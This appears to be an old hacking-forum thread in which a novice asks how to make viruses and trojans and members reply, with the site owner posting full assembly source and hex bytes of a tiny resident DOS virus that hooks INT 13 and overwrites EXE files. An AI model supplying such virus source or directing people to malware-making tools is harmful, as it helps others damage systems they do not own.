CoDinG program

Questions about programming languages and debugging
Post Reply
User avatar
kami
Newbie
Newbie
Posts: 3
Joined: 09 Apr 2006, 16:00
18

CoDinG program

Post by kami »

anYoNe know coding programs that can make vyrus nd trojan .. . Pllzz tell me .. i wnT to learn .

User avatar
FrankB
Ph. D. in Sucko'logics
Ph. D. in Sucko'logics
Posts: 315
Joined: 06 Mar 2006, 17:00
18
Location: Belgistahn
Contact:

Post by FrankB »

Why do you want to write malicious code ?

Anybody can do that..

Why don't you schedule on making something more useful ?

Are you motivated by personal revenge ?

Tell us.

--
FrankB

User avatar
isapiens
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 533
Joined: 05 May 2006, 16:00
17
Location: Turn around

Post by isapiens »

do these people ask questions like this on purpose just to annoy us? He even has to type in a tarded way...
u guys must have a lot of patience not to flame them :lol: i guess its a good thing

User avatar
Gogeta70
^_^
^_^
Posts: 3275
Joined: 25 Jun 2005, 16:00
18

Post by Gogeta70 »

Isapiens, please be respectful to the other members of suck-o. Technically, you just broke a rule...

As you can see, the guy said that he wants to learn, meaning we still can guide him in the right direction.
¯\_(ツ)_/¯ It works on my machine...

Necrix
The Hacker Wolf
The Hacker Wolf
Posts: 746
Joined: 09 Apr 2005, 16:00
19
Location: United States
Contact:

Post by Necrix »

Heh..we tolerate such questions because there's always the chance that the people asking them really do want to learn something.
Image
Anime-Planet.com - anime | manga | reviews

User avatar
isapiens
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 533
Joined: 05 May 2006, 16:00
17
Location: Turn around

Post by isapiens »

I disagree lol, but i respect the rules. So i wont do it again guys. We woud be on the trees right now if we didnt have rules. sorry about that.

User avatar
kami
Newbie
Newbie
Posts: 3
Joined: 09 Apr 2006, 16:00
18

Post by kami »

So guyz can u tell me da programs ..nd coding..cause i wanna se how pepl make viruses ..

User avatar
FrankB
Ph. D. in Sucko'logics
Ph. D. in Sucko'logics
Posts: 315
Joined: 06 Mar 2006, 17:00
18
Location: Belgistahn
Contact:

Post by FrankB »

What kind of 'viruses' do you want to see ?

What is your email address, so i'll send you some :-)

--
FrankB

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:

Post by bad_brain »

there are apps of this kind in the dl-section. but don´t expect a GUI where you just have to click some buttons, without deeper knowledge you will only corrupt your own system.
here´s the source of an old DOS virus:

Code: Select all

; Z0MBiE.32
 
; - 32-byte length
; - resident, hooks INT 13 via INT 2F
; - EXE-overwriting
 
; - DOS-only
; - very unstable
 
; EXECUTABLE:
 
; CODE:
;
;   0100  B4 13 CD 2F 0E 1F BA 14-01 06 53 66 8F 06 20 01
;   0110  CD 2F CD 27 26 80 3F 4D-75 05 0E 07 BB 00 01 EA
 
; SOURCE:
                        model   tiny
                        p386
                        codeseg
 
                        org     100h
start:
                        mov     ah, 13h
                        int     2Fh
 
                        push    cs
                        pop     ds
                        lea     dx, int13
 
                        push    es
                        push    bx
 
                        pop     dword ptr old13
                      ; pop     dword ptr [edx+old13-int13]
 
                        int     2Fh
 
                      ; xchg    dx, ax
                        int     27h
 
int13:                ; cmp     ah, 03h
                      ; jne     exit13
 
                        cmp     byte ptr es:[bx], 'M'
                        jne     exit13
 
                        push    cs
                        pop     es
                        lea     bx, start
 
exit13:                 db      0EAh
 
old13                   dd      ?
 
                        end     start
and this is a VERY basic one....
most new viruses nowadays are based on other viruses, only the source has been slightly edited, but without knowing Assembler it makes no sense to get into it. learning Assembler is a pain in the ass, if your only intention is to code viruses you will not make it....

pseudo_opcode
cyber messiah
cyber messiah
Posts: 1201
Joined: 30 Apr 2006, 16:00
17
Location: 127.0.0.1

Post by pseudo_opcode »

To be able to code your own viruses you have to learn assembly if you dont know already,

as far as i know,(incase my knowledge is not outdated) viruses are of several types e.g boot sector virus, program virus, multipartite virus, polymorphic, macro... etc.

yeah there can be custom viruses written to do specific things, what you need to do is understand the basic concepts.

ok its not neccessary that you code your virus in assembly only, you can create your virus in a batch file or also use any language like c/c++ provided you are a wizard. still in that case as well you might need to know how to use inline assembly with c++, well actuall virus is a vast topic and cannot be explained here, since you have mentioned it, i am thinking of writing a tutorial on viruses, (i have never done this before,and ofcourse i will make sure that i will provide you latest updated knowledge) any one wants to add his knowledge or help me is most welcome.

User avatar
kami
Newbie
Newbie
Posts: 3
Joined: 09 Apr 2006, 16:00
18

gOOd

Post by kami »

ohh goodie .. u told me da code .. but didnt told me where to paste it ... m a newbie... :-P .. if u guyz can tell me da coding progs. nd coding.. dis will solve my prob

User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:

Post by ayu »

Kami.....do you talk like that in real? = /
"The best place to hide a tree, is in a forest"

Post Reply